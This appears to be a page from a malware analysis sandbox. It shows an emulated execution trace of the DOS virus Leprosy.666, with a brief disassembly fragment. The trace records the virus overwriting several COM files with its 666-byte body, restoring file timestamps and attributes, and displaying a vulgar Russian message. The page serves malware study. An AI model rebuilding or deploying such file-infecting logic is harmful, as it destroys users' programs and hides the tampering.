Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.666.Tapeworm

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:24:34.68086149Z 44 PC: 12b9b | Get time
0x12b9b: cmp byte ptr [0x106], 0
0x12ba0: je 0x12ba7
0x12ba2: cmp dh, 0xf
0x12ba5: jg 0x12bb0
0x12ba7: cmp dl, 0
0x12baa: je 0x12b97
0x12bac: mov byte ptr [0x106], dl
0x12bb0: mov byte ptr [0x24c], 0
0x12bb5: mov byte ptr [0x24d], 4
0x12bba: mov byte ptr [0x256], 0
0x12bbf: mov cx, 0x27
0x12bc2: mov dx, 0x131
0x12bc5: mov ah, 0x4e
0x12bc7: int 0x21
0x12bc9: cmp ax, 0x12
0x12bcc: je 0x12bd1
0x12bce: call 0x12bf3
0x12bd1: mov cx, 0x27
0x12bd4: mov dx, 0x137
0x12bd7: mov ah, 0x4e
2018-12-17T22:24:34.683662018Z 78 PC: 12bc9 | Find first file
2018-12-17T22:24:34.689527187Z 78 PC: 12bdb | Find first file
2018-12-17T22:24:34.695580356Z 67 PC: 12c14 | Get or set file attributes
2018-12-17T22:24:34.713517862Z 61 PC: 12c1a | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:34.720074183Z 63 PC: 12c29 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:24:34.726586416Z 62 PC: 12c5d | Close file
2018-12-17T22:24:34.729258092Z 61 PC: 12c66 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:24:34.741030774Z 64 PC: 12a5a | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:24:34.749195479Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:34.751224344Z 62 PC: 12c96 | Close file
2018-12-17T22:24:34.758803548Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T22:24:34.763681313Z 79 PC: 12c4d | Find next file
2018-12-17T22:24:34.766830518Z 67 PC: 12c14 | Get or set file attributes
2018-12-17T22:24:34.776963552Z 61 PC: 12c1a | Open file (Filename = 'PRINT.COM')
2018-12-17T22:24:34.783456148Z 63 PC: 12c29 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:24:34.789530656Z 62 PC: 12c5d | Close file
2018-12-17T22:24:34.791823022Z 61 PC: 12c66 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:24:34.804137788Z 64 PC: 12a5a | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:24:34.812477089Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:34.814818579Z 62 PC: 12c96 | Close file
2018-12-17T22:24:34.822512757Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T22:24:34.827105209Z 79 PC: 12c4d | Find next file
2018-12-17T22:24:34.829494422Z 67 PC: 12c14 | Get or set file attributes
2018-12-17T22:24:34.835862571Z 61 PC: 12c1a | Open file (Filename = 'HELLO.COM')
2018-12-17T22:24:34.842456678Z 63 PC: 12c29 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:24:34.849031619Z 62 PC: 12c5d | Close file
2018-12-17T22:24:34.850848646Z 61 PC: 12c66 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:24:34.862491978Z 64 PC: 12a5a | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:24:34.8722221Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:34.873920437Z 62 PC: 12c96 | Close file
2018-12-17T22:24:34.881749993Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T22:24:34.887751368Z 79 PC: 12c4d | Find next file
2018-12-17T22:24:34.890295917Z 67 PC: 12c14 | Get or set file attributes
2018-12-17T22:24:34.899644779Z 61 PC: 12c1a | Open file (Filename = 'PHANG.COM')
2018-12-17T22:24:34.906841471Z 63 PC: 12c29 | Read file or device (Read 20 bytes on handle 5)
2018-12-17T22:24:34.913001968Z 62 PC: 12c5d | Close file
2018-12-17T22:24:34.914703683Z 61 PC: 12c66 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:24:34.927789833Z 64 PC: 12a5a | Write file or device (Write 666 bytes on handle 5)
2018-12-17T22:24:34.936424078Z 87 PC: 12c8e | Get or set file date and time
2018-12-17T22:24:34.938102734Z 62 PC: 12c96 | Close file
2018-12-17T22:24:34.94709213Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T22:24:34.951831938Z 9 PC: 12cd2 | Display string (String= ' Пиздец Винчестеру ! Press Any Key ...')
2018-12-17T22:24:34.955883846Z 76 PC: 12cd6 | Terminate with return code (Return code = '36')